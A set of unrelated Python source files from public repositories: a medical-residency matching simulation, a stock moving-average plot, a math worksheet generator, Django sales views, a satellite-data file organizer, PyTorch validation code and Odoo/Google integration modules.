def strategy4(priorities, strategy, last3, hospital_value):
indices = [priorities.index(x) for x in last3]
indices.sort(reverse=True)
for i in indices:
# same place as the last 5 items at priority list -> don`t move
if i+2 >= len(strategy) or hospital_value[i] == priorities[i]:
strategy[i] = priorities[i]
elif strategy[i+2] == "":
strategy[i + 2] = priorities[i]
# if the new position is already taken -> don`t move
elif strategy[i+1] == "":
strategy[i+1] = priorities[i]
else:
strategy[i] = priorities[i]
return strategy
# strategy 5: from top3 hospitals - take each one up place, last3 - one down
def strategy5(priorities, strategy, last3, top3, hospital_value):
indices_top = [priorities.index(x) for x in top3]
indices_top.sort()
for i in indices_top:
# same place as at the priority list -> don`t move
if i-1 < 0 or hospital_value[i] == priorities[i]:
strategy[i] = priorities[i]
# if the new position is already taken -> don`t move
elif strategy[i-1] == "":
strategy[i-1] = priorities[i]
# check if valid move
else:
strategy[i] = priorities[i]
indices_last = [priorities.index(x) for x in last3]
indices_last.sort(reverse=True)
for i in indices_last:
# same place as the last 5 items at priority list -> don`t move
if i+1 >= len(strategy) or hospital_value[i] == priorities[i]:
strategy[i] = priorities[i]
elif strategy[i+1] == "":
strategy[i + 1] = priorities[i]
# if the new position is already taken -> don`t move
else:
strategy[i] = priorities[i]
return strategy
# strategy 6 : positions of 15-19 - if you can take each one place up
def strategy6(priorities, strategy, five_better_last5, hospital_value):
indices = [priorities.index(x) for x in five_better_last5]
indices.sort(reverse=True)
for i in indices:
# same place as the last 5 items at priority list -> don`t move
if i-1 < 0 or hospital_value[i] == priorities[i]:
strategy[i] = priorities[i]
elif strategy[i-1] == "":
strategy[i - 1] = priorities[i]
else:
strategy[i] = priorities[i]
return strategy
# strategy 7: same priorities as hospital values
# def strategy7(priorities, strategy, hospital_value):
# return hospital_value
# strategy 8: move item rated 20(according to hospital value) to position 5 of priorities()
# def strategy8(priorities, strategy, rate_20, hospital_value):
# strategy[4] = rate_20
# return strategy
# strategy 9: positions of top5 - move one place down
def strategy9(priorities, strategy, top5):
indices = [priorities.index(x) for x in top5]
indices.sort(reverse=True)
for i in indices:
# same place as the last 5 items at priority list -> don`t move
if i+1 >= len(strategy):
strategy[i] = priorities[i]
elif strategy[i+1] == "":
strategy[i + 1] = priorities[i]
else:
strategy[i] = priorities[i]
return strategy
# strategy 10: positions of last5 - move one place up
def strategy10(priorities, strategy, last5):
indices = [priorities.index(x) for x in last5]
indices.sort()
for i in indices:
# same place as the last 5 items at priority list -> don`t move
if i-1 < 0:
strategy[i] = priorities[i]
elif strategy[i-1] == "":
strategy[i - 1] = priorities[i]
else:
strategy[i] = priorities[i]
return strategy
def get_strategies(hospital_value: list(), priorities):
# initialize list of lists of strategies
strategies = [["" for x in range(len(priorities))] for i in range(10)]
# queue with all the priorities by order
priorities_queue = collections.deque()
[priorities_queue.append(i) for i in priorities]
# strategy 1: one place up - top 5 from hospital_value
# indices of top5 in priorities
top5 = hospital_value[:5]
# fill with top5
strategies[0] = strategy1(priorities, strategies[0], top5, hospital_value)
# fill the rest places of the strategy according to the real priorities
fill_strategy(priorities_queue.copy(), strategies[0])
# strategy 2: one place down - last 5 from hospital_value
# indices of last5 in priorities
last5 = hospital_value[-5:]
# fill with last5
strategies[1] = strategy2(priorities, strategies[1], last5, hospital_value)
# fill the rest places of the strategy according to the real priorities
fill_strategy(priorities_queue.copy(), strategies[1])
# strategy 3: two place up - top 3 from hospital_value
# indices of top3 in priorities
top3 = hospital_value[:3]
# fill with top3
strategies[2] = strategy3(priorities, strategies[2], top3, hospital_value)
# fill the rest places of the strategy according to the real priorities
fill_strategy(priorities_queue.copy(), strategies[2])
# strategy 4: two place down - last 3 from hospital_value
# indices of last3 in priorities
last3 = hospital_value[-3:]
# fill with last5
strategies[3] = strategy4(priorities, strategies[3], last3, hospital_value)
# fill the rest places of the strategy according to the real priorities
fill_strategy(priorities_queue.copy(), strategies[3])
# strategy 5: top3 - one up, last3 - one down, from hospital_value
# last3 and top3 in hospital_value
last3 = hospital_value[-3:]
top3 = hospital_value[:3]
# fill with last5
strategies[4] = strategy5(priorities, strategies[4], last3, top3, hospital_value)
# fill the rest places of the strategy according to the real priorities
fill_strategy(priorities_queue.copy(), strategies[4])
# strategy 6: positions of 15-19 - one up
before_last5 = hospital_value[15:20:1]
# fill with last5
strategies[5] = strategy6(priorities, strategies[5], before_last5, hospital_value)
# fill the rest places of the strategy according to the real priorities
fill_strategy(priorities_queue.copy(), strategies[5])
# strategy 7: same priorities as hospital values
strategies[6] = hospital_value
# strategy 8: move item rated 20(hospital value) to position 5 of priorities
strategies[7][4] = hospital_value[20]
# fill the rest places of the strategy according to the real priorities
fill_strategy(priorities_queue.copy(), strategies[7])
# strategy 9: positions of top5 - one down
strategies[8] = strategy9(priorities, strategies[8], top5)
# fill the rest places of the strategy according to the real priorities
fill_strategy(priorities_queue.copy(), strategies[8])
# strategy 10: positions of top5 - one down
strategies[9] = strategy10(priorities, strategies[9], last5)
# fill the rest places of the strategy according to the real priorities
fill_strategy(priorities_queue.copy(), strategies[9])
return strategies
def simulation_flips_changes(num_of_flips, students, hospitals, sim_number):
# students after the flips
students = flip_priorities(students, num_of_flips, 0.5)
# get the probs if everyone has the same reported priorities
lottery_probs_same, order = make_lottery(students, hospitals, 100)
# happiness of everyone
happiness = lpsolver.get_happiness_coeff(order, students)
# happiness of the first student
result_happiness = np.dot(happiness[0], lottery_probs_same[0])
print("before......:", result_happiness)
improvement_happiness = []
tuple_improve = list()
hospital_value = hospitals.values
strategies = get_strategies(hospital_value, deepcopy(students[0].priorities))
for i in range(len(strategies)):
# set the priorities of the first student with the i strategy
students[0].priorities = strategies[i]
lottery_probs, o = make_lottery(students, hospitals, 100)
# multiple from the result from solve (dot) lottery_probs
result_happiness_after = np.dot(happiness[0], lottery_probs[0])
print("after:", result_happiness_after)
if result_happiness_after > result_happiness:
improvement_happiness.append((students[0].priorities, result_happiness, result_happiness_after, i, num_of_flips))
# if improvement_happiness not empty print the details
if improvement_happiness or num_of_flips == 0:
with open('results/improvement_happiness' + str(sim_number) + '.csv', 'a', newline='') as resultFile:
csv_out = csv.writer(resultFile)
if num_of_flips == 0:
csv_out.writerow(['priorities', 'real_happiness', 'after_strategy_happiness','strategy_id','num_of_flips'])
for tup in improvement_happiness:
csv_out.writerow(tup)
tuple_improve.append((num_of_flips, len(improvement_happiness)))
return tuple_improve
# all the students have the same priorities and we choose th first student and
# changing his priorities randomly and calculate his new happiness according
# of his new priorities
# it seems he always succeed to improve his happiness
def flip_simulation(sim_number):
tuple_improve = list()
# hospitals have 2 fields : 1. names of hospitals, 2. num of seats to each hospital
hospitals = Hospitals.from_csv("res/seats_2018.csv")
# list of students with the same priorities
students = make_student_list(hospitals)
# run the simulation for 25 times with the same strategies and the same priorities
num_of_flips = 20
for i in range(num_of_flips):
tup = simulation_flips_changes(i, students, hospitals, sim_number)
if tup:
tuple_improve.append(tup)
print(tup)
print(" ")
print("tuple improve results list: ")
print(tuple_improve)
def graph_flip_succeed_example():
# open and read the file results
result_file = open('results/improvement_happiness0.csv')
df = pd.read_csv(result_file)
# draw graph1 - improvement happiness by number of flips.
flips_column = df['num_of_flips'].real
num_of_flips, succeed_counter = np.unique(flips_column, return_counts=True)
fig, ax = plt.subplots()
ax.yaxis.set_major_locator(MaxNLocator(integer=True))
ax.xaxis.set_major_locator(MaxNLocator(integer=True))
ax.plot(num_of_flips, succeed_counter)
ax.set(xlabel='number of flips', ylabel='improvements counter', title='improvements by flips number one_simulation')
ax.grid()
fig.savefig("results/flips_improvements_counter_one_simulation.png")
plt.show()
def graph_flips_average_sum():
improvements_counter = np.zeros(1)
files_counter = 0
for result_file in glob.glob('results/*.csv'):
files_counter += 1
# open and read the file results
result = open(result_file)
df = pd.read_csv(result)
# draw graph2 - improvement happiness by number of flips.
flips_column = df['num_of_flips'].real
improvements_counter = np.append(improvements_counter, flips_column)
num_of_flips, succeed_counter = np.unique(improvements_counter, return_counts=True)
succeed_counter = np.divide(succeed_counter, files_counter)
fig, ax = plt.subplots()
# ax.yaxis.set_major_locator(MaxNLocator(integer=True))
ax.xaxis.set_major_locator(MaxNLocator(integer=True))
ax.plot(num_of_flips, succeed_counter)
ax.set(xlabel='number of flips', ylabel='improvements counter', title='Improvements by flips - Average')
ax.grid()
fig.savefig("results/flips_improvements_average_results.png")
plt.show()
def processing_results():
# full graph description (average sum of the improvements according to flips)
graph_flips_average_sum()
# graph of one simulation from one csv file
# graph_flip_succeed_example()
# active flips simulation:
# num of flips get higher every iteration
# student[0] is the trickster - he have 10 strategies - trying to improve his condition
def run_flips_simulations():
number_of_sim = 300
for sim_num in range(number_of_sim):
flip_simulation(sim_num)
# run sim1
run_flips_simulations()
# process the results the of flips simulation
processing_results()
| adielcahana/OneSideMatching | simulations.py | simulations.py | py | 16,922 | python | en | code | 0 | github-code | 50 |
43953129748 | def sma(prices, nday):
sma_data = [0] * len(prices)
for i in range(nday, len(prices)):
sma_data[i] = sum(prices[i - nday:i]) / nday
return sma_data
def read_data(file):
f = open(file)
f.seek(0)
all_data = f.read()
all_data_list = all_data.split('\n')
data = [x.split(',') for x in all_data_list[1:] if x != '']
dates = [d[0] for d in data]
prices = [float(d[5]) for d in data]
f.close()
return dates, prices
import pandas as pd
from datetime import datetime
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
def makeplot(dates, prices, data_sma1, data_sma2):
dates = pd.to_datetime(dates)
DF = pd.DataFrame()
DF['prices'] = prices
DF['sma1'] = data_sma1
DF['sma2'] = data_sma2
DF = DF.set_index(dates)
plt.figure(figsize=(12, 5))
plt.title('Costco Wholesale Corporation (COST) 1 Year Data and SMA')
plt.plot(DF['prices'], linestyle='--', color='red', linewidth=2.0, label='COST')
plt.plot(DF['sma1'], color='green', linestyle='-.', linewidth=3.0, label='COST_sma10')
plt.plot(DF['sma2'], 'bo', markersize=1.2, label='COST_sma50')
plt.ylim(250, 400)
plt.legend()
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%m/%Y'))
plt.gca().xaxis.set_major_locator(mdates.MonthLocator(interval=1))
plt.savefig('cost_sma10_sma50.png')
plt.show()
def zero_to_nan(values):
return [float('nan') if x == 0 else x for x in values]
def main():
dates, prices = read_data('COST.csv')
data_sma1 = zero_to_nan(sma(prices, 10))
data_sma2 = zero_to_nan(sma(prices, 50))
makeplot(dates, prices, data_sma1, data_sma2)
main() | akirayang0521/Akira-Python | CIS191 Introduction to Programming/hw4_costco_stock_sma_yang.py | hw4_costco_stock_sma_yang.py | py | 1,737 | python | en | code | 0 | github-code | 50 |
7338054873 | import random as random
import numpy as np
import pandas as pd
class Operation:
def __init__(self,operation):
self.operation=operation
self.number1, self.number2, self.number3 = self.election(operation)
self.printer = self.printing(operation)
def election(self,operation):
if operation=='sum':
a1 = random.randint(0,90)
a2 = random.randint(0,90)
return a1, a2, a1+a2
elif operation=='rest':
a1 = random.randint(0,10)
a2 = random.randint(0,10)
return a1+a2, a1, a2
elif operation=='mult':
a1 = random.randint(0,10)
a2 = random.randint(0,10)
return a1, a2, a1*a2
elif operation=='div':
a1 = random.randint(0,10)
a2 = random.randint(0,10)
return a1*a2, a1, a2
elif operation=='tocent':
t = random.randint(0,2)
if t==0:
n = random.randint(0,10)
return n, 10-n, 10
elif t==1:
n = random.randint(0,100)
return n, 100-n, 100
elif t==2:
n = random.randint(0,1000)
return n, 1000-n, 1000
def printing(self,operation):
if operation=='sum':
return str(self.number1) + ' + ' + u"\u25A1" + ' = '+ str(self.number3)
elif operation=='rest':
return str(self.number1) + ' - ' + u"\u25A1" + ' = '+ str(self.number3)
elif operation=='mult':
return str(self.number1) + ' '+u"\u2027"+' ' + u"\u25A1" + ' = '+ str(self.number3)
elif operation=='div':
return str(self.number1) + ' : ' + u"\u25A1" + ' = '+ str(self.number3)
elif operation=='tocent':
if self.number3==10:
return str(self.number1) + ' |D|'
elif self.number3==100:
return str(self.number1) + ' |C|'
elif self.number3==1000:
return str(self.number1) + ' |M|'
#operation = ['sum','rest','mult','div']
class Block:
def __init__(self,number):
self.block = number
self.list, self.sol = self.generate(number)
def generate(self,number):
if number == 1:
lista = []
sol = []
pos = 'sum'
for i in range(30):
o = Operation(pos)
lista.append(o.printer)
sol.append(o.number2)
return lista, sol
elif number ==2:
lista = []
sol = []
pos = ['sum','rest']
for i in range(15):
for e in pos:
o = Operation(e)
lista.append(o.printer)
sol.append(o.number2)
return lista , sol
elif number ==3:
lista = []
sol = []
pos = ['div','sum','rest','mult','sum']
for i in range(6):
for e in pos:
o = Operation(e)
lista.append(o.printer)
sol.append(o.number2)
return lista, sol
elif number ==4:
lista = []
sol = []
pos = 'tocent'
for i in range(30):
o = Operation(pos)
lista.append(o.printer)
sol.append(o.number2)
return lista, sol
class Sheet:
def __init__(self,idn):
self.b = [Block(1), Block(2), Block(3),Block(4)]
self.l = [self.b[i].list for i in range(len(self.b))]
self.s = [self.b[i].sol for i in range(len(self.b))]
self.name_q = 'questions_' + str(idn)
self.name_s = 'solutions_' + str(idn)
self.printer_questions()
self.printer_sol()
def printer_questions(self):
table_0 = pd.DataFrame(np.array(['A','B','C','D','E','F']).reshape(1,6),columns=['A','B','C','D','E','F'],index=np.array(['']))
table_sol = pd.DataFrame(np.array([ [' '] for i in range(36)]).reshape(6,6).T,columns=['A','B','C','D','E','F'],index=np.array( [' ' for j in range(6) ]))
l = [pd.DataFrame(np.array(self.l[i]).reshape(6,5).T,columns=['A','B','C','D','E','F'],index=np.arange(1,6)) for i in range(len(self.l))]
c=[]
for i in range(len(self.l)):
c = c + [l[i]] + [table_sol] + [table_0]
trash = c.pop
table = pd.concat(c)
table.to_excel(self.name_q + '.xls')
def printer_sol(self):
table_0 = pd.DataFrame(np.array(['A','B','C','D','E','F']).reshape(1,6),columns=['A','B','C','D','E','F'],index=np.array(['']))
table_sol = pd.DataFrame(np.array([ [' '] for i in range(36)]).reshape(6,6).T,columns=['A','B','C','D','E','F'],index=np.array( [' ' for j in range(6) ]))
l = [pd.DataFrame(np.array(self.l[i]).reshape(6,5).T,columns=['A','B','C','D','E','F'],index=np.arange(1,6)) for i in range(len(self.l))]
s = [pd.DataFrame( np.concatenate([np.array(self.s[i]).reshape(6,5).T, np.array([[' ' for j in range(6)]])] ) ,columns=['A','B','C','D','E','F'],index=np.array( [' ' for k in range(6) ])) for i in range(len(self.s))]
c = []
for i in range(len(self.l)):
c = c + [l[i]] + [s[i]] + [table_0]
trash = c.pop
table = pd.concat(c)
table.to_excel(self.name_s + '.xls')
for i in range(20):
Sheet(i)
##for i in range(1):
## sheet(i)
##b = Block(1)
##l1 = b.list
##b = Block(2)
##l2 = b.list
##b = Block(3)
##l3 = b.list
##
##
##writer = pd.ExcelWriter('block.xls')
##
##
##table_0.to_excel(writer,sheet_name='sheet0')
##
##table_1 = pd.DataFrame(np.array(l1).reshape(6,5).T,columns=['A','B','C','D','E','F'],index=np.arange(1,6))
##table_1.to_excel(writer,sheet_name='sheet1')
##
##table_2 = pd.DataFrame(np.array(l2).reshape(6,5).T,columns=['A','B','C','D','E','F'],index=np.arange(1,6))
##table_2.to_excel(writer,sheet_name='sheet2')
##
##table_3 = pd.DataFrame(np.array(l3).reshape(6,5).T,columns=['A','B','C','D','E','F'],index=np.arange(1,6))
##table_3.to_excel(writer,sheet_name='sheet3')
##writer.save()
##
##
##table_sol = pd.DataFrame(np.array([ [' '] for i in range(36)]).reshape(6,6).T,columns=['A','B','C','D','E','F'],index=np.array( [' ' for i in range(6) ]))
##
##pd.concat([table_1,table_sol,table_0,table_2,table_sol,table_0,table_3,table_sol]).to_excel('hola.xls')
## table_1 = pd.DataFrame(np.array(self.b1.list).reshape(6,5).T,columns=['A','B','C','D','E','F'],index=np.arange(1,6))
## table_2 = pd.DataFrame(np.array(self.b2.list).reshape(6,5).T,columns=['A','B','C','D','E','F'],index=np.arange(1,6))
## table_3 = pd.DataFrame(np.array(self.b3.list).reshape(6,5).T,columns=['A','B','C','D','E','F'],index=np.arange(1,6))
## table_4 = pd.DataFrame(np.array(self.b4.list).reshape(6,5).T,columns=['A','B','C','D','E','F'],index=np.arange(1,6))
## table_sol = pd.DataFrame(np.array([ [' '] for i in range(36)]).reshape(6,6).T,columns=['A','B','C','D','E','F'],index=np.array( [' ' for i in range(6) ]))
## pd.concat([table_1,table_sol,table_0,table_2,table_sol,table_0,table_3,table_sol,table_0,table_4,table_sol]).to_excel('hola.xls')
##
| tgquintela/educational-content | Computation exams/classes.py | classes.py | py | 7,360 | python | en | code | 0 | github-code | 50 |
17773861568 | from inspect import Attribute
from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from . models import Sale
from . forms import SaleForm
from . utils import searchSales
# Create your views here.
@login_required(login_url='login')
def sales(request):
sales, search_query = searchSales(request)
# totalamount = Sale.objects.get(volume=33)
# totalamount.volume = (totalamount.price)*2
# totalamount.save()
context = {'sales':sales, 'search_query':search_query}
return render(request, 'saletemplates/sales.html', context)
@login_required(login_url='login')
def sale(request, pk):
sale = Sale.objects.get(id=pk)
context = {'sale':sale}
return render(request, 'saletemplates/sale-details.html', context)
@login_required(login_url='login')
def addSale(request):
form = SaleForm()
# initial_data = {
# 'customer_name':'deleted',
# }
if request.method == 'POST':
form = SaleForm(request.POST)
if form.is_valid():
form.save()
return redirect('add-sale')
# else:
# form=SaleForm(initial = initial_data)
context = {'form':form}
return render(request, 'saletemplates/add-sale-form.html', context)
| nguonodave/shell-POS-mgt-syst | sales/views.py | views.py | py | 1,277 | python | en | code | 0 | github-code | 50 |
72909929436 | # 将下载的CALIPSO数据按天分类,存放到相应的文件夹下
# CAL_LID_L2_01kmCLay-Standard-V4-20.2007-12-31T23-51-28ZN.hdf --> ./20071231/
# CAL_LID_L2_01kmCLay-Standard-V4-20.2008-01-01T00-37-48ZD.hdf --> ./20080101/
# ...
# CAL_LID_L2_01kmCLay-Standard-V4-20.2008-12-31T23-15-13ZD.hdf --> ./20081231/
import os
import shutil
import pandas as pd
# 获取文件下所有文件名
def get_files(root_path): # 注意root_path前加上r
'''
获得目录root_path下(包括各级子目录)所有文件的路径
'''
file_list = os.listdir(root_path)
return file_list
# 按天查找文件名
def word_in_files(root_path, word):
'''
获得目录root_path下(包括各级子目录)所有包含字符串word的文件的路径
'''
file_list = get_files(root_path)
result = []
for path in file_list:
if path[35:45] == word:
result.append(path)
return result
# 生成日期列表
def DAYlist(start,end):
yearmonthday = pd.date_range(start,end,freq="D").strftime("%Y-%m-%d").to_list()
return yearmonthday
if __name__ == '__main__':
# print(word_in_files('./','(1)'))
days = DAYlist('2008-01-01','2008-12-31') # 生成日期列表
for daynum in days:
files = word_in_files('F:/CALIPSO/2008', daynum)
path = 'F:/CALIPSO/2008/' + daynum[0: 4]+daynum[5:7] + daynum[8:10]
# print(path)
if not os.path.exists(path): # 创建日期文件夹
os.mkdir(path)
for file in files:
filepath = path + '/' + file # 拼接移动目标路径
file = 'F:/CALIPSO/2008/' + file
# print(filepath)
shutil.move(file,filepath) # 移动源文件到目标文件夹
# break
pass | eraevil/No-trash | neaten_CALIPSO_data/src/handle.py | handle.py | py | 1,773 | python | en | code | 0 | github-code | 50 |
29593535843 | from typing import Dict, Tuple
import torch
from torch.utils.data import DataLoader
from model import NNModel
from utils import try_gpu
def valid(model: NNModel, test_loader: DataLoader) -> float:
correct = 0
total = 0
model.eval()
with torch.no_grad():
for data in test_loader:
images, labels = data
images = try_gpu(images)
labels = try_gpu(labels)
outputs, _ = model(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print(f"accuracy ({total} images): {correct/total}")
return correct / total
def valid_each_class(model: NNModel, test_loader: DataLoader, class_names: Tuple[str]) -> Dict[str, float]:
correct_preds = {name: 0 for name in class_names}
total_preds = {name: 0 for name in class_names}
model.eval()
with torch.no_grad():
for data in test_loader:
images, labels = data
images = try_gpu(images)
labels = try_gpu(labels)
outputs, _ = model(images)
_, predictions = torch.max(outputs.data, 1)
for label, prediction in zip(labels, predictions):
if label == prediction:
correct_preds[class_names[label]] += 1
total_preds[class_names[label]] += 1
accuracies = {}
for name, correct in correct_preds.items():
total = total_preds[name]
accuracy = float(correct) / total
print(f"accuracy ({name}, {total} images): {accuracy}")
accuracies[name] = accuracy
return accuracies
| wararaki718/scrapbox4 | ml_sample/sample_influence_balanced_loss/valid.py | valid.py | py | 1,683 | python | en | code | 0 | github-code | 50 |
22058821747 | #Brandon Jones
#2/26/19
#Jones_M3P1
#This program will find the highest,lowest,average,and total of a set of data
def main():
num=int(input("Enter how many numbers you would like to enter: "))
my_list=[0]*num
for index in range(num):
number=int(input("Enter a value: "))
my_list[index]=number
ave=sum(my_list)/num
print(my_list)
print(max(my_list), "is the highest number")
print(min(my_list), "is the lowest number")
print(sum(my_list), "is the total of the list")
print(ave, "is the average of the list")
main()
| Jonesb5977/csc121 | Jones_M3P1.py | Jones_M3P1.py | py | 595 | python | en | code | 0 | github-code | 50 |
10670365119 | import numpy as np
import subprocess
all_iterations = []
batch_sizes = [1, 2, 3, 4, 5, 8, 10, 15, 20, 25, 50]
for j in batch_sizes:
iterations = []
for i in range(0, 100):
command = "./planner.sh --algorithm bspi --mdp data/MDP50_%d.txt --batchsize %d" % (i, j)
it = int(subprocess.check_output(command, shell=True))
print("File %d, Size %d - %d iterations" % (i, j, it))
iterations.append(it)
print("Mean (Size %d) - %.6f" % (j, np.mean(iterations)))
print("Std (Size %d) - %.6f" % (j, np.std(iterations)))
| martiansideofthemoon/cs747-assignments | assign2/run_bspi.py | run_bspi.py | py | 559 | python | en | code | 0 | github-code | 50 |
71061066074 | import base64
import csv
import io
from odoo import api, models, fields
import xmlrpc.client
class ImportCsvEstatePropertyWizard(models.TransientModel):
_name = "import.csv.estate.property.wizard"
_description = "Wizard to load Properties from CSV"
# your file will be stored here:
csv_file = fields.Binary(string='CSV File', required=True)
#property_ids = fields.Many2one("estate.property", string="Name", default=lambda self: self.env['estate.property'].search([]))
def import_csv(self):
csv_data = base64.b64decode(self.csv_file)
data_file = io.StringIO(csv_data.decode("utf-8"))
data_file.seek(0)
file_reader = []
csv_dict = csv.DictReader(data_file, delimiter=',')
csv_reader = csv.reader(data_file, delimiter=',')
file_reader.extend(csv_reader)
file_reader[0] = [x.lower() for x in file_reader[0] ]
file_reader[0] = [x.replace(" ", "_") for x in file_reader[0] ]
#reader = csv.DictReader(base64.b64decode(self.csv_file).split('\n'))
#reader = csv.DictReader(base64.b64decode(self.csv_file).decode('file_encoding').encode('utf-8').split('\n')) #For files with different encoding
return self.bulk_create_estate_property(file_reader)
def bulk_insert_estate_property(self, csv_reader):
insert_query = ""
i = 0
for row in csv_reader:
i += 1
if i < 2:
header = ','.join(row)
header = header.lower()
header = header.replace(" ", "_")
insert_query = "INSERT INTO {}({}) VALUES ".format('estate_property', header)
else:
row_values = str("({}), ".format(row))
row_values = row_values.replace("[", "")
row_values = row_values.replace("]", "")
insert_query += row_values
insert_query = insert_query[:-2] #eliminamos la coma última
try:
self._cr.execute(insert_query)
self._cr.commit()
except Exception as ex:
print(ex)
return False
return True
def bulk_create_estate_property(self, list_reader):
headers, values = list_reader[0], list_reader[1:]
dictionary_of_properties = [dict(zip(headers, value)) for value in values]
for entry in dictionary_of_properties:
self.env['estate.property'].create(entry)
"""
url, db, username, password = 'https://localhost:8069', 'odoo_tesis_db1', 'a20160500', 'test'
common = xmlrpc.client.ServerProxy('{}/xmlrpc/2/common'.format(url))
uid = common.authenticate(db, username, password, {}) #authentication
if uid:
print("authentication succeeded")
models = xmlrpc.client.ServerProxy('{}/xmlrpc/2/object'.format(url))
property_types = models.execute_kw(db, uid, password, 'estate.property.type', 'read', [list(range(1,100))], {'fields': ['name']})
for row in csv_reader:
print("---row---: ", row)
print("Property Types from BD")
print(property_types)
else:
print("authentication failed")
""" | CodeBreakerMG/Tesis-Odoo-Contabilidad | odoo/custom_addons/estate/wizards/import_csv_estate_property_wizard.py | import_csv_estate_property_wizard.py | py | 3,262 | python | en | code | 0 | github-code | 50 |
35855005883 | nomes = []
def menor_nome(list):
"""
-> Função devolve o menor mome escrito
param: lista de nomes
"""
menor = cont = 0
for i in list:
a = len(i)
if cont == 0:
menor = a
nome_m = i.capitalize()
if a < menor:
menor = a
nome_m = i.capitalize()
cont +=1
print(nome_m)
return menor, nome_m
'''while True:
resp = 'S'
nom = str(input('Digite um nome: ')).strip().upper()
resp = str(input('Quer continuar? [S/N]:')).upper()[0]
nomes.append(nom.strip())
if resp == 'N':
break'''
#nomes =['ana','joao','aninha','Pedro','joni']
#men = menor_nome(['maria', 'josé', 'PAULO', 'Catarina'])
menor_nome(['maria', 'josé', 'PAULO', 'Catarina'])
#print(menor_nome(nome_m))
'''print('-+-'*10)
print(f'O menor nome da lista é = {men[1]}')
print('-+-'*10)
'''
| SricardoSdSouza/Curso-da-USP | Coursera 2/exercicios da aula/str_menor.py | str_menor.py | py | 890 | python | pt | code | 0 | github-code | 50 |
21001568320 | import pandas as pd
import re
from datetime import datetime
import os
import logging
def transform_data(data):
# -- Logging
path = 'C:/Users/Jhonatans/projects/ETL/Etl-Car-Recommendation/'
if not os.path.exists(path + 'logs'):
os.makedirs(path + 'logs')
logging.basicConfig(
filename= path + 'logs/etl_icarros.txt',
level = logging.DEBUG,
format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s -',
datefmt= '%Y-%m-%d %H:%M:%S'
)
logger = logging.getLogger('etl_icarros')
# Store transormation
car_engine = []
km = []
color = []
transmission = []
description = []
# model_brand
data['brand'] = data['model_brand'].apply(lambda x: x.split(' ')[0].strip('\n').lower())
data['model'] = data['model_brand'].apply(lambda x: x.split(' ')[1].strip('\n').lower())
for text in data['model_brand']:
position = text.find(' ')
text_procured = text[position:]
try:
car_engine.append(re.search('(\d.\d)', text_procured).group(1).lower())
except AttributeError:
car_engine.append('')
# Motor
data['motor'] = car_engine
data['motor'] = data['motor'].apply(lambda x: 'uninformed' if x == '' else x.replace('0 1', '1.0').replace('2 1', '2.0').replace('250', '2.5').replace('5 2', '5.2').replace('230', '2.3').replace('208', '2.0'))
# price
data['price'] = data['price'].apply(lambda x: x.split(' ')[1].replace('preço', ''))
# year_km_color_cambio for year
data['year'] = data['year_km_color_cambio'].apply(lambda x: re.search('(\d+)', x.split(' ')[0].strip()).group(1))
# advertiser
data['district'] = data['advertiser'].apply(lambda x: x.strip().replace('\n\n', '\n').split('\n')[0].lower())
data['city'] = data['advertiser'].apply(lambda x: x.strip().replace('\n\n', '\n').split('\n')[1].lower())
data['state'] = 'sp'
for i in data['year_km_color_cambio']:
position_km = i.rfind('Km')
position_color = i.rfind('Cor')
km.append(i[position_km:position_color].replace(' ', '').replace('\n', '').replace('Km', ''))
color.append(i[position_color:].replace('\n', ' ').split(' ')[0].lower())
try:
transmission.append(i[position_color:].replace('\n', ' ').split(' ')[1].lower())
except IndexError:
regex = bool(re.search('auto\w.\w+', i))
if regex == True:
transmission.append('automático')
else:
transmission.append('manual')
try:
description.append(i[position_color:].replace('\n', ' ').split(' ')[2].lower())
except IndexError:
description.append(i[position_color:].replace('\n', ' '))
data['km'] = km
data['color'] = color
data['transmission'] = transmission
data['advertiser_description'] = description
logger.info('Dados derivados OK')
# Clean color and transmission
data['color'] = data['color'].apply(lambda x: x.replace('cor ', ''))
data['transmission'] = data['transmission'].apply(lambda x: x.replace('câmbio ', ''))
# Drop columns
data.drop(columns=['model_brand', 'advertiser', 'year_km_color_cambio'], inplace=True)
# -- Change type
data['price'] = data['price'].apply(lambda x: x.replace('.', '').replace(',', '.')).astype('float')
data['km'] = data['km'].apply(lambda x: x[:6] if len(x) > 8 else x).astype('float')
logger.info('Mudanca de tipos OK')
# date scrapy
date_now = datetime.now().strftime('%Y-%m-%d')
data['scrapy_date'] = date_now
return data | Jhonatanslopes/Etl-Car-Recommendation | src/transform.py | transform.py | py | 3,645 | python | en | code | 0 | github-code | 50 |
28324708686 | # -*- coding: utf-8 -*-
from odoo import api, fields, models, _
from odoo.exceptions import UserError, RedirectWarning
import time
import json
import requests
from werkzeug import urls
import logging
_logger = logging.getLogger(__name__)
TIMEOUT = 20
GOOGLE_AUTH_ENDPOINT = 'https://accounts.google.com/o/oauth2/auth'
GOOGLE_TOKEN_ENDPOINT = 'https://accounts.google.com/o/oauth2/token'
GOOGLE_API_BASE_URL = 'https://www.googleapis.com'
unique_id_increment = 0
def get_unique_id():
"""Generates a unique ID.
The ID is based on the current UNIX timestamp and a runtime increment.
Returns:
A unique string.
"""
global unique_id_increment
if unique_id_increment is None:
unique_id_increment = 0
unique_id_increment += 1
return "%d%d" % (int(time.time()), unique_id_increment)
class GoogleMerchantCenterService(models.Model):
_name = 'google.merchant.center.service'
_description = "GMC Service"
#ACS: Copy from google account but used access_token only instead of refresh token
#Becuse of return UIR had to add this method
@api.model
def _get_google_token_uri(self, service, scope):
get_param = self.env['ir.config_parameter'].sudo().get_param
web_base_url = get_param("web.base.url")
encoded_params = urls.url_encode({
'scope': scope,
'redirect_uri': web_base_url + '/google_content/authentication',
'client_id': get_param('google_%s_client_id' % service),
'response_type': 'code',
})
return '%s?%s' % (GOOGLE_AUTH_ENDPOINT, encoded_params)
#ACS: Copy from google account but used access_token only instead of refresh token
#Becuse of return UIR had to add this method
@api.model
def generate_refresh_token(self, service, authorization_code):
""" Call Google API to refresh the token, with the given authorization code
:param service : the name of the google service to actualize
:param authorization_code : the code to exchange against the new refresh token
:returns the new refresh token
"""
Parameters = self.env['ir.config_parameter'].sudo()
client_id = Parameters.get_param('google_%s_client_id' % service)
client_secret = Parameters.get_param('google_%s_client_secret' % service)
redirect_uri = Parameters.get_param('google_redirect_uri')
web_base_url = Parameters.get_param("web.base.url")
